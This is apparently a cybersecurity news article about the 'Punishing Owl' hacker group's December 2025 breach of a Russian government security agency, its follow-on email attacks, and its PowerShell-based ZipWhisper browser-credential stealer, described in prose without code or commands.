A new and sophisticated hacker group, operating under the moniker “Punishing Owl,” has emerged, launching targeted cyberattacks against Russian government security agencies. The group announced its presence on December 12, 2025, claiming responsibility for a successful network breach of a prominent Russian government security entity.
Punishing Owl demonstrated its intent to maximize public exposure by publishing stolen internal documents on a data leak site and also mirroring the files on a Mega.nz repository. The group employed a multi-faceted approach to amplify the impact of its operation, including sophisticated DNS manipulation and a strategic timing of its announcement to hinder response efforts.
Following the initial breach, Punishing Owl escalated its campaign by initiating business email compromise (BEC) attacks against the breached agency’s partners and contractors. Analysis by Habr security researchers indicated that these malicious emails were dispatched from a Brazilian server, utilizing email addresses designed to mimic the compromised victim’s domain. These messages falsely confirmed the network intrusion and urged recipients to urgently review attached documents, likely containing further malicious payloads.
The infrastructure utilized by Punishing Owl reveals a notable degree of technical sophistication, despite the group’s recent emergence. Security analysts have identified the configuration of fake TLS certificates, the establishment of IMAP and SMTP services for their email operations, and the deployment of a PowerShell-based information stealer known as ZipWhisper. This stealer is designed to harvest browser credentials from infected systems.
Infection Mechanism and Credential Theft by Punishing Owl
The ZipWhisper stealer employs a multi-stage infection process designed to extract sensitive web browser data from compromised hosts. When a victim opens a disguised LNK file, it silently executes PowerShell commands. These commands are responsible for downloading the stealer payload from the attacker’s command-and-control (C2) infrastructure.
Once active, the malware proceeds to locate and collect files containing user credentials, session cookies, and saved passwords from various web browsers. This gathered information is then compressed into password-protected ZIP archives, which are given specific naming conventions that often include the username and chunk numbers, aiding the attackers in organizing stolen data.
These temporary archives are stored within the victim’s AppData/Local/Temp directory. Subsequently, the stealer uploads these archives to the attacker’s C2 server through a custom endpoint structure. This method of data exfiltration is designed to be stealthy, blending in with normal network traffic.
Further analysis of the stealer’s code has revealed comments that suggest the potential use of artificial intelligence (AI) tools in generating parts of the malicious script. This points to Punishing Owl potentially leveraging modern development techniques to accelerate and enhance their operational capabilities, particularly in their focus on Russian critical infrastructure targets.
The group also strategically timed its initial breach announcement for Friday evening at 6:37 PM. This timing was deliberate, calculated to delay incident response efforts and ensure maximum public visibility of their cyberattack. The manifesto accompanying the stolen documents provides insight into their motivations, although the specific details of their political grievances have not been fully disclosed.
The technical sophistication evident in Punishing Owl’s methods, including their use of DNS redirection to a Brazilian server to host stolen data and their manifesto, coupled with the deployment of advanced tools like ZipWhisper, indicates a well-resourced and determined adversary. The continued targeting of Russian government security networks suggests a potential for sustained and evolving cyber campaigns from this new threat actor.
Moving forward, cybersecurity experts will be closely monitoring for any further activity from Punishing Owl, including potential follow-on attacks or expansions of their targeting. The group’s utilization of what appears to be AI-assisted scripting is a notable development worthy of continued investigation, as it could signal a new trend in the capabilities of emerging hacker collectives.